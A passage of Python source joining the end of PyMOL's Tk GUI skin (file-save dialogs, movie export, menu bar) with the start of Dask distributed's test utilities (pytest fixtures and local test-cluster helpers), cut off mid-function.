filter_entry.pack(pady=6, fill='x', expand=0, padx=10)
multiple_files_option = Pmw.RadioSelect( dialog.interior(),
labelpos='w',
orient='vertical',
selectmode='single',
label_text="Save to...",
buttontype="radiobutton",
)
multiple_files_option.add("one file")
multiple_files_option.add("multiple files")
multiple_files_option.invoke("one file")
multiple_files_option.pack(side='left', pady=8)
states_option = Pmw.RadioSelect( dialog.interior(),
labelpos='w',
orient='vertical',
selectmode='single',
label_text='Saved state...',
buttontype="radiobutton"
)
states_option.add("all")
states_option.add("global")
states_option.add("object's current")
states_option.invoke("global")
states_option.pack(side='right', pady=8)
# The listbox is created empty. Fill it now.
update_save_listbox()
if len(dialog.component('scrolledlist').get()):
# set focus on the first item
listbox = dialog.component('scrolledlist')
listbox.selection_set(0)
self.my_show(dialog)
def file_save2(self, sels, multiple_files_flag, state_flag):
filetypes_save = [
("PDB File","*.pdb"),
("MOL File","*.mol"),
("MOL2 File","*.mol2"),
("MMD File","*.mmd"),
("PKL File","*.pkl"),
("SDF File","*.sdf"),
("PDBx/mmCIF","*.cif"),
("PQR","*.pqr"),
("Maestro","*.mae"),
("XYZ","*.xyz"),
]
if True:
# save N>1 objects to ONE file
if multiple_files_flag == "one file" and len(sels)>=1:
sfile = '_'.join(sels) if len(sels) < 3 else \
sels[0] + '-and-%d-more' % (len(sels) - 1)
sfile = asksaveasfilename(defaultextension = _def_ext(".pdb"),
initialfile = sfile,
initialdir = self.initialdir,
filetypes=filetypes_save)
if len(sfile):
# maybe use PDBSTRs for saving multiple files to multiple states
self.initialdir = os.path.dirname(sfile)
save_sele = ' or '.join(["("+str(x)+")" for x in sels])
self.cmd.log("save %s,(%s)\n"%(sfile,save_sele),
"cmd.save('%s','(%s)')\n"%(sfile,save_sele))
if state_flag == "all":
self.cmd.save(sfile,"(%s)"%save_sele,state=0,quiet=0)
elif state_flag == "object's current":
ap = 0
for sel in sels:
s = int(self.cmd.get("state", str(sel)))
self.cmd.multisave(sfile,str(sel),state=s, quiet=0, append=ap)
ap = 1
else:
self.cmd.save(sfile,"(%s)"%save_sele,quiet=0)
return
else:
# save to many files
for curName in sels:
## print "Result is: ", result
## print "Sels is: ", sels
## print "CurName is: ", curName
## print "State flag is: ", state_flag
# The only special case for saving files is when the user selects a multi-state object
# and wants to save that to multiple files, each state in one file.
doSplit=False
if state_flag=='all':
stateSave = "0"
if len(sels)==1:
# print "User wants to split a file"
doSplit=True
elif state_flag=='global':
stateSave = self.cmd.get_state()
elif state_flag=="object's current":
stateSave = int(self.cmd.get("state",curName))
# print "Saving curren't object's state as: ", stateSave
else: # default to current global
stateSave = "state=", self.cmd.get_state()
if True:
sfile = asksaveasfilename(defaultextension = _def_ext(".pdb"),
initialfile = curName,
initialdir = self.initialdir,
filetypes = filetypes_save)
# now save the file (customizing states as necessary)
# print "sfile is: ", sfile
if len(sfile):
# maybe use PDBSTRs for saving multiple files to multiple states
self.initialdir = os.path.dirname(sfile)
save_sele = str("("+curName+")")
if doSplit:
# save each state in "save_sele" to file "sfile" as 'sfile_stateXYZ.pdb'
s = self.cmd.count_states(save_sele)
for stateSave in range(1,int(s)+1):
save_file = sfile
# _state004
inter = "_state" + str(stateSave).zfill(len(str(s))+1)
# g either MATCHES *.pdb or not. If so, save, name_stateXYZ.pdb
g = re.search("(.*)(\..*)$", save_file)
if g!=None:
# 1PDB_state004.pdb
save_file = g.groups()[0] + inter + g.groups()[1]
else:
# user entered a file w/o an extension name: eg, '1abc'
# this saves to, '1abc_state00XYZ'
save_file = save_file + inter
self.cmd.log("save %s,(%s)\n"%(save_file,save_sele),
"cmd.save('%s','(%s)', state='%s')\n"%(save_file,save_sele,stateSave))
self.cmd.save(save_file,"(%s)"%save_sele,state=stateSave,quiet=0)
else:
save_file = sfile
# just save current selection to one file
self.cmd.log("save %s,(%s)\n"%(save_file,save_sele),
"cmd.save('%s','(%s)', state='%s')\n"%(save_file,save_sele,stateSave))
self.cmd.save(save_file,"(%s)"%save_sele,state=stateSave,quiet=0)
def edit_pymolrc(self):
from pmg_tk import TextEditor
TextEditor.edit_pymolrc(self)
def file_run(self):
ofile = askopenfilename(initialdir = os.getcwd(),
filetypes=[("All Runnable","*.pml"),
("All Runnable","*.pym"),
("All Runnable","*.py"),
("All Runnable","*.pyc"),
("PyMOL Script","*.pml"),
("Python Program","*.py"),
("Python Program","*.pyc"),
("PyMOL Program","*.pym"),
("All Files","*.*"),
("All Files","*"),
])
if len(ofile):
self.__script__ = ofile
if re.search("\.pym*$|\.PYM*$",ofile):
self.cmd.do("run "+ofile);
else:
self.cmd.do("@"+ofile);
def file_save_png(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".png"),
initialdir = self.initialdir,
filetypes=[("PNG File","*.png")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("png %s\n"%sfile,"cmd.png('%s')\n"%sfile)
self.cmd.png(sfile,quiet=0)
def file_save_wrl(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".wrl"),
initialdir = self.initialdir,
filetypes=[("VRML 2 WRL File","*.wrl")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s\n"%sfile,"cmd.save('%s')\n"%sfile)
self.cmd.save(sfile,quiet=0)
def file_save_dae(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".dae"),
initialdir = self.initialdir,
filetypes=[("COLLADA File","*.dae")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s\n"%sfile,"cmd.save('%s')\n"%sfile)
self.cmd.save(sfile,quiet=0)
def file_save_pov(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".pov"),
initialdir = self.initialdir,
filetypes=[("POV File","*.pov")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s\n"%sfile,"cmd.save('%s')\n"%sfile)
self.cmd.save(sfile,quiet=0)
def file_save_mpeg(self):
try:
from pymol import mpeg_encode
if not mpeg_encode.validate():
print("produce-error: Unable to validate pymol.mpeg_encode")
raise
except:
tkMessageBox.showerror("Error",
"MPEG encoder missing.\nThe FreeMOL add-ons may not be installed.")
return
def command(value):
mQual = int(w_quality.get())
mode = 'ray' if w_ray.get() else 'draw'
viewport = int(w_viewport[0].get()), int(w_viewport[1].get())
dialog.destroy()
if value != 'OK':
return
sfile = asksaveasfilename(defaultextension = _def_ext(".mpg"),
initialdir = self.initialdir,
filetypes=[("MPEG movie file","*.mpg")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
mQual = self.cmd.get_setting_int("movie_quality")
self.cmd.log("movie.produce %s,quality=%d,quiet=0\n"%(sfile,mQual),
"cmd.movie.produce('''%s''',quality=%d,quiet=0)\n"%(sfile,mQual))
self.cmd.movie.produce(sfile, mode, quality=mQual, quiet=0,
width=viewport[0], height=viewport[1])
dialog = Pmw.Dialog(title='Movie Settings', buttons=('OK', 'Cancel'),
defaultbutton='OK', command=command)
parent = dialog.interior()
gridkw = {'padx': 5, 'pady': 5, 'sticky': W, 'row': 0}
Label(parent, text='Encoding Quality (0-100)',).grid(column=0, **gridkw)
w_quality = Pmw.Counter(parent,
entryfield_value=self.cmd.get_setting_int("movie_quality"),
entryfield_validate={'validator': 'integer', 'min': 0, 'max': 100})
w_quality.grid(column=1, **gridkw)
gridkw['row'] += 1
Label(parent, text='Ray Trace Frames').grid(column=0, **gridkw)
w_ray = BooleanVar(parent, self.cmd.get_setting_boolean('ray_trace_frames'))
Checkbutton(parent, variable=w_ray).grid(column=1, **gridkw)
w_viewport = []
for text, value in zip(('Width', 'Height'), self.cmd.get_viewport()):
gridkw['row'] += 1
Label(parent, text=text + ' (pixels)').grid(column=0, **gridkw)
w = Pmw.Counter(parent, entryfield_value=value, entryfield_validate={'validator': 'integer', 'min': 0})
w.grid(column=1, **gridkw)
w_viewport.append(w)
def file_save_mpng(self):
sfile = asksaveasfilename(initialdir = self.initialdir,
filetypes=[("Numbered PNG Files","*.png")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("mpng %s\n"%sfile,"cmd.mpng('%s')\n"%sfile)
self.cmd.mpng(sfile,modal=-1)
def cat_terms(self):
for path in [ "$PYMOL_PATH/LICENSE.txt", "$PYMOL_PATH/LICENSE.TXT", "$PYMOL_PATH/LICENSE" ]:
path = self.pymol.cmd.exp_path(path)
if os.path.exists(path):
print(open(path).read().strip())
return
print(" Error: no license terms found.")
def toggleClickThrough(self, toggle):
if toggle:
os.system(
"defaults write com.apple.x11 wm_click_through -bool true")
os.system(
"defaults write org.x.X11 wm_click_through -bool true")
os.system(
"defaults write com.apple.x11 wm_ffm -bool true")
os.system(
"defaults write org.x.X11 wm_ffm -bool true")
print("Enabled wm_click_through and wm_ffm.", end=' ')
else:
os.system(
"defaults write com.apple.x11 wm_click_through -bool false")
os.system(
"defaults write org.x.X11 wm_click_through -bool false")
os.system(
"defaults write com.apple.x11 wm_ffm -bool false")
os.system(
"defaults write org.x.X11 wm_ffm -bool false")
print("Disabled wm_click_through and wm_ffm.", end=' ')
print("Please restart X11.")
def createMenuBar(self):
self.menuBar = Pmw.MenuBar(self.root, balloon=self.balloon,
hull_relief=RAISED, hull_borderwidth=1)
self.menuBar.pack(fill=X)
addmenuitem = self.menuBar.addmenuitem
addcascademenu = self.menuBar.addcascademenu
self.setting = Setting(self.app)
def _addmenu(data, parent):
for item in data:
if item[0] == 'separator':
addmenuitem(parent, 'separator', '')
elif item[0] == 'menu':
label = item[1]
menulabel = parent + '/' + label
self.menuBar.addcascademenu(parent, menulabel,
label, label=label, tearoff=FALSE)
_addmenu(item[2], menulabel)
elif item[0] == 'command':
label = item[1]
command = item[2]
if command is None:
if DEBUG:
print('warning: skipping', label, parent)
else:
if isinstance(command, str):
command = lambda c=command: self.cmd.do(c)
addmenuitem(parent, 'command', label, label=label, command=command)
elif item[0] == 'check':
label = item[1]
var = getattr(self.setting, item[2])
if len(item) > 4:
addmenuitem(parent, 'checkbutton', label, label=label, variable=var, onvalue=item[3], offvalue=item[4])
else:
addmenuitem(parent, 'checkbutton', label, label=label, variable=var)
elif item[0] == 'radio':
label = item[1]
var = getattr(self.setting, item[2])
value = item[3]
addmenuitem(parent, 'radiobutton', label=label, value=value, variable=var)
elif DEBUG:
print('error:', item)
for _, label, data in self.get_menudata():
assert _ == 'menu'
self.menuBar.addmenu(label, label, tearoff=TRUE)
_addmenu(data, label)
# self.menuBar.addmenuitem('Help', 'command', 'Release Notes',
# label='Release Notes',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('release')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on Commands',
# label='Commands',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('commands')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Launching',
# label='Launching',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('launching')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on Selections',
# label='Select Command',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('select')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Selections',
# label='Selection Syntax',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('selections')"))
# self.menuBar.addmenuitem('Help', 'command', 'Example Selections',
# label='Selection Examples',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('examples')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on the Mouse',
# label='Mouse',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('mouse')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on the Keyboard',
# label='Keyboard',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('keyboard')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Molecular Editing',
# label='Molecular Editing',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('editing')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Molecular Editing',
# label='Molecular Editing Keys',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('edit_keys')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Stereo',
# label='Stereo',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('stereo')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on the API',
# label='API',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('api')"))
# self.toggleBalloonVar = IntVar()
# self.toggleBalloonVar.set(0)
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'checkbutton',
# 'Toggle balloon help',
# label='Balloon help',
# variable = self.toggleBalloonVar,
# command=self.toggleBalloon)
if sys.platform == 'win32' and self.app.pymol.invocation.options.incentive_product:
self.menuBar.addmenuitem('Edit', 'separator', '')
self.menuBar.addmenuitem('Edit', 'command',
'Copy Image',
label='Copy Image to Clipboard',
command = lambda s=self:s.cmd.copy_image(quiet=0))
self.menuBar.addmenuitem('Edit', 'checkbutton',
'Auto-Copy Images',
label='Auto-Copy Images',
variable = self.setting.auto_copy_images,
)
self.menuBar.addmenuitem('Edit', 'separator', '')
self.menuBar.addmenuitem('Edit', 'command',
'To Copy Text: Use Ctrl-C in TclTk GUI',
label='To copy text use Ctrl-C in the TclTk GUI',
state='disabled',
command = None)
self.menuBar.addmenuitem('Edit', 'command',
'To Paste Text, Use Ctrl-V in TclTk GUI',
label='To paste text use Ctrl-V in the TckTk GUI',
state='disabled',
command = None)
if sys.platform == 'darwin':
self.menuBar.addmenuitem('Mouse', 'separator', '')
self.menuBar.addcascademenu('Mouse', 'MacX11Focus', 'Mac OS X11',
label='Mac OS X11')
self.menuBar.addmenuitem('MacX11Focus', 'command',
'Enable Click Through',
label='Enable Click Through',
command = lambda s=self:
s.toggleClickThrough(1))
self.menuBar.addmenuitem('MacX11Focus', 'command',
'Disable Click Through',
label='Disable Click Through',
command = lambda s=self:
s.toggleClickThrough(0))
# hook up scene menu updates
index = self.pymol.setting.index_dict.get('scenes_changed')
self.setting.active_dict[index] = self.update_scene_menu
def settings_edit_all_dialog(self):
SetEditor(self)
def edit_colors_dialog(self):
ColorEditor(self)
def update_scene_menu(self):
scene_list = self.cmd.get_scene_list()
for action in ['recall', 'clear']:
parent = 'Scene/' + action.capitalize()
self.menuBar.deletemenuitems(parent, 0, 999)
for k in scene_list:
self.menuBar.addmenuitem(parent, 'command', k, label=k,
command=lambda k=k, a=action: self.cmd.scene(k, a))
parent = 'Scene/Store'
self.menuBar.deletemenuitems(parent, 0, 11)
for i in range(12):
k = 'F' + str(i + 1)
self.scene_F_keys[i].set(1 if k in scene_list else 0)
self.menuBar.addmenuitem(parent, 'checkbutton', k, label=k,
variable=self.scene_F_keys[i],
command=lambda k=k: self.cmd.scene(k, 'store'))
def show_about(self):
Pmw.aboutversion(self.appversion)
Pmw.aboutcopyright(self.copyright)
Pmw.aboutcontact(
'For more information, browse to: %s\n or send email to: %s' %\
(self.contactweb, self.contactemail))
self.about = Pmw.AboutDialog(self.root, applicationname=self.appname)
self.my_activate(self.about)
self.about.withdraw()
def createInterface(self):
self.balloon = Pmw.Balloon(self.root)
self.createMenuBar()
self.app.menuBar = self.menuBar # to support legacy plugins
self.app.initializePlugins()
self.createDataArea()
self.createCommandArea()
self.createButtons()
self.createMessageBar()
self.createConsole()
def setup(self):
# call the parent method
PMGSkin.setup(self)
# name the application
self.root.title(self.appname)
# create the user interface
self.createInterface()
# pack the root window
self.app._hull.pack(side=LEFT, fill=BOTH, expand=YES, anchor=CENTER)
# and set focus
if hasattr(self,'entry'): self.entry.focus_set()
def takedown(self):
self.destroyMessageBar()
self.destroyDataArea()
self.destroyCommandArea()
self.destroyButtonArea()
self.balloon.destroy()
self.menuBar.destroy()
def __init__(self,app):
global root
root = app.root
PMGSkin.__init__(self,app)
Normal.appversion = app.pymol.cmd.get_version()[0]
Normal.appversion += " Incentive Product" \
if app.pymol.invocation.options.incentive_product else \
" Open-Source"
self.app = app
self.save_file = ''
self.cmd = app.pymol.cmd
self.util = app.pymol.util
self.movie_command = None
self.movie_start = 1
self.auto_overlay = None
self.edit_mode = None
self.valence = None
self._initialdir = ''
self.fixedfont = tkFont.nametofont('TkFixedFont')
self.scene_F_keys = [IntVar(root) for _ in range(12)]
def __init__(app):
return Normal(app)
|
utils_test.py
|
import asyncio
import collections
import copy
import functools
import gc
import inspect
import io
import itertools
import logging
import logging.config
import os
import queue
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import uuid
import warnings
import weakref
from contextlib import contextmanager, nullcontext, suppress
from glob import glob
from time import sleep
from distributed.scheduler import Scheduler
try:
import ssl
except ImportError:
ssl = None
import pytest
from tlz import assoc, memoize, merge
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from distributed.comm.tcp import TCP
from . import system
from .client import Client, _global_clients, default_client
from .comm import Comm
from .compatibility import WINDOWS
from .config import initialize_logging
from .core import CommClosedError, ConnectionPool, Status, connect, rpc
from .deploy import SpecCluster
from .diagnostics.plugin import WorkerPlugin
from .metrics import time
from .nanny import Nanny
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
DequeHandler,
TimeoutError,
_offload_executor,
get_ip,
get_ipv6,
iscoroutinefunction,
log_errors,
mp_context,
reset_logger_locks,
sync,
thread_state,
)
from .worker import Worker
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
_TEST_TIMEOUT = 30
_offload_executor.submit(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
async def cleanup_global_workers():
for worker in Worker._instances:
await worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
@contextmanager
def mock_ipython():
from unittest import mock
from distributed._ipython_utils import remote_magic
ip = mock.Mock()
ip.user_ns = {}
ip.kernel = None
def get_ip():
return ip
with mock.patch("IPython.get_ipython", get_ip), mock.patch(
"distributed._ipython_utils.get_ipython", get_ip
):
yield ip
# cleanup remote_magic client cache
for kc in remote_magic._clients.values():
kc.stop_channels()
remote_magic._clients.clear()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
class _UnhashableCallable:
__hash__ = None
def __call__(self, x):
return x + 1
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict = collections.defaultdict(int)
_varying_key_gen = itertools.count()
class _ModuleSlot:
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
async def geninc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
async def asyncinc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
_readone_queues = {}
async def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = asyncio.Queue()
async def background_read():
while True:
try:
messages = await comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
background_read()
msg = await q.get()
if msg is None:
raise CommClosedError
else:
return msg
def run_scheduler(q, nputs, config, port=0, **kwargs):
with dask.config.set(config):
from distributed import Scheduler
# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
async def _():
scheduler = await Scheduler(
validate=True, host="127.0.0.1", port=port, **kwargs
)
for i in range(nputs):
q.put(scheduler.address)
await scheduler.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Worker(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Nanny(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
yield
# Some streams can take a bit of time to notice their peer
# has closed, and keep a coroutine (*) waiting for a CommClosedError
# before calling close_rpc() after a CommClosedError.
# This would happen especially if a non-localhost address is used,
# as Nanny does.
# (*) (example: gather_from_workers())
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
async def wait():
await async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
# Compatibility. A lot of tests simply use `c` as fixture name
c = client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
@contextmanager
def cluster(
nworkers=2,
nanny=False,
worker_kwargs={},
active_rpc_timeout=10,
disconnect_timeout=20,
scheduler_kwargs={},
config={},
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1, config),
kwargs=scheduler_kwargs,
)
ws.add(scheduler)
scheduler.daemon = True
scheduler.start()
# Launch workers
workers = []
for i in range(nworkers):
q = mp_context.Queue()
fn = "_test_worker-%s" % uuid.uuid4()
kwargs = merge(
{
"nthreads": 1,
"local_directory": fn,
"memory_limit": system.MEMORY_LIMIT,
},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q, config),
kwargs=kwargs,
)
ws.add(proc)
workers.append({"proc": proc, "queue": q, "dir": fn})
for worker in workers:
worker["proc"].start()
try:
for worker in workers:
worker["address"] = worker["queue"].get(timeout=5)
except queue.Empty:
raise pytest.xfail.Exception("Worker failed to start in test")
saddr = scheduler_q.get()
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {"connection_args": security.get_connection_args("client")}
except KeyError:
rpc_kwargs = {}
with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = loop.run_sync(s.ncores)
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers
]
finally:
logger.debug("Closing out test cluster")
loop.run_sync(
lambda: disconnect_all(
[w["address"] for w in workers],
timeout=disconnect_timeout,
rpc_kwargs=rpc_kwargs,
)
)
loop.run_sync(
lambda: disconnect(
saddr, timeout=disconnect_timeout, rpc_kwargs=rpc_kwargs
)
)
scheduler.terminate()
scheduler_q.close()
scheduler_q._reader.close()
scheduler_q._writer.close()
for w in workers:
w["proc"].terminate()
w["queue"].close()
w["queue"]._reader.close()
w["queue"]._writer.close()
scheduler.join(2)
del scheduler
for proc in [w["proc"] for w in workers]:
proc.join(timeout=30)
with suppress(UnboundLocalError):
del worker, w, proc
del workers[:]
for fn in glob("_test_worker-*"):
with suppress(OSError):
shutil.rmtree(fn)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
start = time()
while any(proc.is_alive() for proc in ws):
text = str(list(ws))
sleep(0.2)
assert time() < start + 5, ("Workers still around after five seconds", text)
async def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
async def do_disconnect():
with rpc(addr, **rpc_kwargs) as w:
# If the worker was killed hard (e.g. sigterm) during test runtime,
# we do not know at this point and may not be able to connect
with suppress(EnvironmentError, CommClosedError):
# Do not request a reply since comms will be closed by the
# worker before a reply can be made and we will always trigger
# the timeout
await w.terminate(reply=False)
await asyncio.wait_for(do_disconnect(), timeout=timeout)
async def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
await asyncio.gather(*(disconnect(addr, timeout, rpc_kwargs) for addr in addresses))
def gen_test(timeout=_TEST_TIMEOUT):
"""Coroutine test
@gen_test(timeout=5)
async def test_foo():
await ... # use tornado coroutines
"""
assert timeout, (
"timeout should always be set and it should be smaller than the global one from"
